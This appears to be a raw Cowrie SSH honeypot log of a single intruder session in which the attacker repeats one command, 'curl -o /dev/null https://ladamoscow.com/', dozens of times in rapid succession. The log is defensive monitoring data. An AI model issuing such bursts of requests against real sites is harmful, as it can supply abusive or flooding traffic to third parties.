{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:02.407742Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:02.445060Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:02.446075Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:02.483399Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:02.484354Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:02.521177Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:02.522360Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:02.559724Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:02.560668Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:02.597734Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:02.598727Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:02.635635Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:02.637002Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:02.673657Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:02.674580Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:02.721123Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:02.721975Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:02.758981Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:02.759907Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:02.797495Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:02.798412Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:02.835310Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:02.836266Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:02.877170Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:02.878052Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:02.915277Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:02.916258Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:02.955238Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:02.956147Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:02.993347Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:02.994229Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:03.035502Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:03.036466Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:03.073481Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:03.074732Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:03.121871Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:03.122838Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:03.159746Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:03.160641Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:03.204733Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:03.205966Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:03.244318Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:03.245255Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:03.283409Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:03.284313Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:03.323952Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:03.324944Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:03.364823Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:03.365824Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:03.404016Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:03.405073Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:03.628933Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:03.629814Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:03.672445Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:03.673402Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:03.725135Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:03.726216Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:03.767698Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:03.768790Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:03.809680Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:03.810915Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:03.850507Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:03.851545Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:03.899231Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:03.900189Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:03.939880Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:03.941114Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:03.983342Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:03.984327Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:04.028165Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:04.029234Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:04.069201Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:04.070156Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:04.106811Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:04.107809Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:04.155047Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:04.156067Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:04.193815Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:04.194814Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:04.232709Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:04.233740Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:04.276828Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:04.277907Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:04.316871Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:04.317921Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:04.359343Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:04.360380Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:04.398223Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:04.399526Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:04.438782Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:04.439720Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:04.476876Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:04.477831Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:04.515252Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:04.516482Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:04.564426Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:04.565609Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:04.602910Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:04.603881Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:04.640792Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:04.641721Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:04.678758Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:04.679797Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:04.717855Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:04.718938Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:04.756828Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:04.757816Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:04.795176Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:04.796122Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:04.835954Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:04.837279Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:04.875112Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:04.875991Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:04.915680Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:04.916536Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:04.967024Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:04.969165Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:05.010945Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:05.011903Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:05.049152Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:05.050085Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:05.087445Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:05.088934Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:05.127458Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:05.128532Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:05.168974Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:05.169915Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:05.207217Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:05.208602Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:05.247697Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
